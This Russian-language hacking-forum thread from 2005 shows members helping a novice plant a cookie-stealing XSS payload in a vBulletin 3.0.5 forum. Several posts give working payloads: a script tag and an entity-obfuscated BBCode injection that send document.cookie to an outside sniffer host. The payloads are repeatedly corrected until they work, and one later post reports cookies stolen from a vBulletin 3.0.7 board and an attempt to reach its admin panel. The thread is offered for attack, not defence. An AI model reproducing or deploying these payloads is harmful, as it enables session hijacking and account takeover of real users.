Форумы XSS на Bulletin Version 3.0.5

Discussion in 'Уязвимости CMS/форумов' started by Extrim, 12 Dec 2005.

  1. Extrim

    Extrim Banned

    Joined:
    13 Nov 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    -1
    Скажите пожалуста как код снифера встовлять в тему......
    Вот например код
    Code:
    <script>img=new Image(); img.src="http://s.netsec.ru//s.gif?id=591&"+document.cookie;</script>
    и все или что то надо менять в этом коде ???
    Ответти мне на этот вопрос пожалуста..Я со снифером первый раз роботаю !
     
  2. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    В какую тему и какого форума ты это вставлять собрался? Адрес твоего сниффера нужно вставлять в Код Xss специальный для твоей версии форума. А ЭТО просто пример того, как можно украсть куки, но долеко не та конструкция с помощью которой это надо делать=)) Скажи что за форум?
     
  3. Extrim

    Extrim Banned

    Joined:
    13 Nov 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    -1
    Powered by: vBulletin Version 3.0.5
    Помогите плиз
     
  4. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    HTML:
    [URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/url][/FONT][/URL]
    Вот попробуй. Только удали плюсы из спец. символов, чтобы работало. Закодирован пол сниффер античата.
     
  5. Extrim

    Extrim Banned

    Joined:
    13 Nov 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    -1
    ***************************
    PHP:
    [URL=wj[url]http://www.][FONT=Arial style=display:none; style=background:url(javascript:document.&+#105;m&+#97;ges[1].src="http:/&47;antichat&+#46;ru/cgi-&+#98;in/s.jpg?"+document.cookie;)  / ]wj [/url][/FONT][/URL]
    ***********************************
    Вот-так ??Я плюсы убрал...если нетак плиз розкажи как надо я просто хочю попробывать на зуб XSS
     
    #5 Extrim, 13 Dec 2005
    Last edited: 13 Dec 2005
  6. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Ну все, вставляй и иди на лог античата. ток вроде плюсы не везде убрал
     
  7. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Мне что, за тебя плюсики уберать? И ГДЕ Ж ТЫ ПЛЮСЫ-ТО убрал????
    Я сказал плюсы убрать только в спец. символах! Пример. Было &+#58, а становится просто &#58, понятно??? Я не знаю, как ещё проще объяснить....
    Не забываем про репутацию
     
  8. $ZLO$

    $ZLO$ Elder - Старейшина

    Joined:
    15 Jan 2005
    Messages:
    59
    Likes Received:
    3
    Reputations:
    0
    а куда конкретно его вставлять в свой пост? и канает ли данная XSS в vBulletin v3.5.2 ?
     
  9. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Extrim Ты не все плюсы убрал!!! Со зрением чтоли плохо? Со второй попытки и то не все=)))
    Нет.
     
  10. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    А у кого нить есть этот декодер,чтобы так же делать из букв в такие коды?
     
    #10 cardons, 13 Dec 2005
    Last edited: 13 Dec 2005
  11. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    cardons А причем тут тема XSS на Bulletin 3.5.0??? НЕ флейми!=)
    зы qBiN уже отвечал на ЭТОТ твой вопрос в другой теме.
     
  12. Extrim

    Extrim Banned

    Joined:
    13 Nov 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    -1
    Вот посмотри теперь правильно ?
    Code:
    [URL=wj[url]http://www.][FONT=Arial style=display:none; style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;) ]wj[/url][/FONT][/URL]
     
    #12 Extrim, 13 Dec 2005
    Last edited: 13 Dec 2005
  13. Extrim

    Extrim Banned

    Joined:
    13 Nov 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    -1
    ??
    Вроде везде пдюсы поубирал ?
     
  14. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    перед document.cookie + поставь
     
  15. Extrim

    Extrim Banned

    Joined:
    13 Nov 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    -1
  16. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Вместо ссылки на ачатовский сниффер впиши ссылку к твоему. Вида _http://s.netsec.ru//s.gif?id=[ID]&
    зы и всё-таки ещё не все плюсы ты убрал-)
     
  17. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Воще где то было в нете но я просрал страницу. Потом нашёл прогу URICrypt классная штука ищи в нете если что.
     
  18. milord69

    milord69 New Member

    Joined:
    24 Nov 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    А что тогда канает для данного движка? Есть хоть что-нибудь?
     
  19. milord69

    milord69 New Member

    Joined:
    24 Nov 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Стырил куки с Bulletin 3.0.7
    А в админку попасть не могу! Пишет типа введите логин и пароль... Как добыть то это мокрое дело?
     
  20. member_ru

    member_ru Elder - Старейшина

    Joined:
    8 Dec 2005
    Messages:
    46
    Likes Received:
    3
    Reputations:
    0
    milord69, в булке же соль. Не расшифруешь ты. никак, имхо.